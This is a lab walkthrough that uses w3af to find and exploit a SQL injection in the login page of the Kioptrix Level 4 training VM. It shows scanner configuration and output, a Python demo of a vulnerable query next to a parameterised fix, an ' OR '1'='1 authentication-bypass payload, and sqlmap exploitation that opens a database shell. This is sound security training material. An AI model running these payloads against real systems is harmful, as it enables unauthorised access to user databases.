0×00 Overview
This walkthrough uses w3af on BackTrack 5 R3 to find and exploit a SQL injection in the Kioptrix Level 4 VM.
0×01 Introduction
w3af (Web Application Attack and Audit Framework) is a web application attack and audit framework. The project ships more than 130 plugins, covering checks such as SQL injection (SQL Injection), cross-site scripting (XSS), local file inclusion (LFI) and remote file inclusion (RFI). Its goal is to provide a framework for finding and exploiting web application vulnerabilities that is easy to use and to extend.
0×02 Installation
root@bt:~# apt-get install w3af
0×03 Starting w3af
root@bt:~# cd /pentest/web/w3af/
root@bt:/pentest/web/w3af# ./w3af_console
0×04 Configuring plugins and the target
w3af>>> plugins                                                      // enter the plugins menu
w3af/plugins>>> list discovery                                       // list the available discovery plugins
w3af/plugins>>> discovery findBackdoor phpinfo webSpider             // enable the findBackdoor, phpinfo and webSpider discovery plugins
w3af/plugins>>> list audit                                           // list the available audit plugins
w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss     // enable the blindSqli, fileUpload, osCommanding, sqli and xss audit plugins
w3af/plugins>>> back                                                 // return to the main menu
w3af>>> target                                                       // enter the target configuration menu
w3af/config:target>>> set target http://192.168.244.132/             // set the target to http://192.168.244.132/
w3af/config:target>>> back                                           // return to the main menu
0×05 Starting the scan
w3af>>> start
---
New URL found by phpinfo plugin: http://192.168.244.132/
New URL found by phpinfo plugin: http://192.168.244.132/checklogin.php
New URL found by phpinfo plugin: http://192.168.244.132/index.php
New URL found by webSpider plugin: http://192.168.244.132/
New URL found by webSpider plugin: http://192.168.244.132/checklogin.php
New URL found by webSpider plugin: http://192.168.244.132/index.php
Found 3 URLs and 8 different points of injection.
The list of URLs is:
- http://192.168.244.132/index.php
- http://192.168.244.132/checklogin.php
- http://192.168.244.132/
The list of fuzzable requests is:
- http://192.168.244.132/ | Method: GET
- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")
- http://192.168.244.132/checklogin.php | Method: GET
- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")
- http://192.168.244.132/index.php | Method: GET
- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")
Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.
SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.
Scan finished in 19 seconds.
---                                                                  // scan results: both a blind and an error-based SQL injection in the mypassword POST parameter of checklogin.php
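To make the finding above concrete, here is an added, constructed example (not code from this post and not the real Kioptrix checklogin.php): a login check that splices the myusername and mypassword POST fields straight into SQL, the parameterised fix beside it, and a minimal error-based probe that sends the same `d'z"0` style payload w3af used and greps the response for database error text, which is how the sqli audit plugin flagged response 989. It uses an in-memory SQLite table instead of the target's MySQL `members` database; the table contents, the `ERROR_SIGNATURES` list and the helper names (`vulnerable_login`, `hardened_login`, `probe_error_sqli`, `auth_bypass`) are all assumptions made for the example.

```python
import re
import sqlite3

# Constructed stand-in for the target's 'members' database (SQLite, not MySQL).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
conn.execute("INSERT INTO members VALUES ('John', 'secret')")


def vulnerable_login(myusername: str, mypassword: str) -> str:
    """Query built by string formatting: the pattern w3af's sqli plugin detected.

    Returns 'ok', 'denied', or the raw driver error text, mimicking a page that
    leaks its database error into the HTML (the 'mysql_' fragment w3af matched).
    """
    sql = ("SELECT * FROM members WHERE username='%s' AND password='%s'"
           % (myusername, mypassword))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc
    return "ok" if row else "denied"


def hardened_login(myusername: str, mypassword: str) -> str:
    """Parameterised query: user input is bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT * FROM members WHERE username=? AND password=?",
        (myusername, mypassword),
    ).fetchone()
    return "ok" if row else "denied"


# Assumed error fragments an error-based SQLi check looks for in a response.
ERROR_SIGNATURES = [r"SQL error", r"not a valid MySQL", r"mysql_", r"syntax error"]


def probe_error_sqli(handler, params: dict, target_param: str) -> bool:
    """Append w3af's d'z"0 probe to one parameter and look for leaked DB errors.

    True means the handler echoed a database error for the tampered request,
    i.e. the parameter is injectable and the application leaks error text.
    """
    tampered = dict(params)
    tampered[target_param] = params[target_param] + "d'z\"0"
    response = handler(**tampered)
    return any(re.search(sig, response, re.IGNORECASE) for sig in ERROR_SIGNATURES)


def auth_bypass(handler) -> str:
    """Classic tautology through the injectable password field."""
    return handler("John", "' OR '1'='1")


if __name__ == "__main__":
    base = {"myusername": "John", "mypassword": "x"}
    print("vulnerable leaks error:", probe_error_sqli(vulnerable_login, base, "mypassword"))
    print("hardened leaks error:  ", probe_error_sqli(hardened_login, base, "mypassword"))
    print("bypass on vulnerable:  ", auth_bypass(vulnerable_login))
    print("bypass on hardened:    ", auth_bypass(hardened_login))
```

Running it shows the two halves of the w3af report: the tampered password makes the string-built query fail and the error text surfaces in the response (the error-based finding), while a tautology in the same field logs in as John without the password (what the blind finding lets sqlmap go on to exploit). The parameterised version returns a plain "denied" for both inputs.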
0×06 Exploiting the vulnerability
w3af>>> exploit                                                      // enter the exploit menu
w3af/exploit>>> list exploit                                         // list the available exploit plugins
w3af/exploit>>> exploit sqlmap                                       // use the sqlmap exploit plugin against the SQL injection found by the scan
---
Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <sqlobject ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )>
Please use the interact command to interact with the shell objects.
---                                                                  // the SQL injection was exploited successfully and one shell object (number 0) is available; note the database runs as root@localhost
0×07 Interacting with the shell
w3af/exploit>>> interact 0                                           // interact + shell object number opens the shell
---
Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shell
w3af/exploit/sqlmap-0>>>
---                                                                  // the sqlmap shell prompt
w3af/exploit/sqlmap-0>>> dbs
---
Available databases: [3]:
[*] information_schema
[*] members
[*] mysql
---                                                                  // lists the databases reachable through the injection